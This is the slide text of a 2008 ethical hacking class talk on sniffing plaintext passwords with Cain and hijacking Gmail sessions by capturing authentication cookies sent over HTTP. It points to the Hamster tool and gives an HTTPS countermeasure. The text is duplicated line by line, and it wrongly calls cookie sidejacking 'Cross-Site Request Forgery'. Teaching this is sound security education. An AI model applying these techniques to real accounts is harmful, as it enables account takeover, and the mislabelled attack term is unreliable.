ethical hacking: hacking gmail. teaching hacking
TRANSCRIPT
Ethical Hacking:Ethical Hacking:Hacking GMailHacking GMail
Teaching HackingTeaching Hacking
3
What do Hackers Do?What do Hackers Do?
Get into computer systems without valid Get into computer systems without valid accounts and passwordsaccounts and passwords
Open encrypted files without the keyOpen encrypted files without the key Take over Web serversTake over Web servers Collect passwords from Internet trafficCollect passwords from Internet traffic Take over computers with remote access Take over computers with remote access
trojanstrojans And much, much moreAnd much, much more
4
Ethical HackersEthical Hackers
Ethical Hackers do the same thing criminal Ethical Hackers do the same thing criminal hackers do, with one differencehackers do, with one difference
Ethical Hackers have permission from the Ethical Hackers have permission from the owner of the machines to hack inowner of the machines to hack in
These "Penetration Tests" reveal security These "Penetration Tests" reveal security problems so they can be fixedproblems so they can be fixed
5
Two Hacking ClassesTwo Hacking ClassesCNIT 123: Ethical Hacking and Network DefenseCNIT 123: Ethical Hacking and Network Defense
Has been taught since Spring 2007 (four times)Has been taught since Spring 2007 (four times)
Face-to-face and Online sections available Fall 2008Face-to-face and Online sections available Fall 2008
CNIT 124: Advanced Ethical HackingCNIT 124: Advanced Ethical HackingTaught for the first time in Spring 2008Taught for the first time in Spring 2008
6
Certificate in Network Certificate in Network SecuritySecurity
7
Associate of Science Degree Associate of Science Degree
8
Student AgreementStudent Agreement
Required for every student in CNIT 123: Required for every student in CNIT 123: Ethical Hacking and Network Defense or Ethical Hacking and Network Defense or CNIT 124: Advanced Ethical HackingCNIT 124: Advanced Ethical Hacking
Sniffing Plaintext Sniffing Plaintext PasswordsPasswords
10
Insecure Login PagesInsecure Login Pages
HTTP does not HTTP does not encrypt dataencrypt data
Always look for Always look for HTTPS on login HTTPS on login pagespages
11
Tool: CainTool: Cain
Click NIC icon to start snifferClick NIC icon to start sniffer Click Sniffer tab, Password tab on bottomClick Sniffer tab, Password tab on bottom
From http://www.oxid.it/cain.htmlFrom http://www.oxid.it/cain.html
Authentication CookiesAuthentication Cookies
13
GMail Uses HTTPSGMail Uses HTTPS
Sniffing for Sniffing for passwords won't passwords won't workwork
Most Web mail Most Web mail services now use services now use HTTPS tooHTTPS too
14
CookiesCookies
Thousands of people are Thousands of people are using Gmail all the timeusing Gmail all the time
How can the server know How can the server know who you are?who you are?
It puts a cookie on your It puts a cookie on your machine that identifies machine that identifies youyou
15
Gmail's CookiesGmail's Cookies
Gmail identifies Gmail identifies you with these you with these cookiescookies In Firefox, Tools, In Firefox, Tools,
Options, Privacy, Options, Privacy, Show CookiesShow Cookies
Cross-Site Request Cross-Site Request Forgery (XSRF)Forgery (XSRF)
17
Web-based EmailWeb-based Email
Router
TargetUsingEmail
AttackerSniffingTraffic
To Internet
18
Cross-Site Request Forgery Cross-Site Request Forgery (XSRF)(XSRF)
Gmail sends the password through a Gmail sends the password through a secure HTTPS connectionsecure HTTPS connection That cannot be captured by the attackerThat cannot be captured by the attacker
But the cookie identifying the user is sent But the cookie identifying the user is sent in the clear—with HTTPin the clear—with HTTP That can easily be captured by the attackerThat can easily be captured by the attacker
The attacker gets into your account The attacker gets into your account without learning your passwordwithout learning your password
19
DemonstrationDemonstration
20
XSRF CountermeasureXSRF Countermeasure
Use Use https://mail.google.comhttps://mail.google.com instead of instead of http://gmail.comhttp://gmail.com
No other mail service has this option at all, No other mail service has this option at all, as far as I knowas far as I know
21
ReferencesReferences
CainCain http://www.oxid.it/cain.htmlhttp://www.oxid.it/cain.html
HamsterHamster http://erratasec.blogspot.com/2007/08/http://erratasec.blogspot.com/2007/08/
sidejacking-with-hamster_05.htmlsidejacking-with-hamster_05.html
22
ContactContact
Sam BowneSam Bowne Computer Networking and Information Computer Networking and Information
TechnologyTechnology City College San FranciscoCity College San Francisco Email: [email protected]: [email protected] Web: samsclass.infoWeb: samsclass.info
Last modified 6-26-08Last modified 6-26-08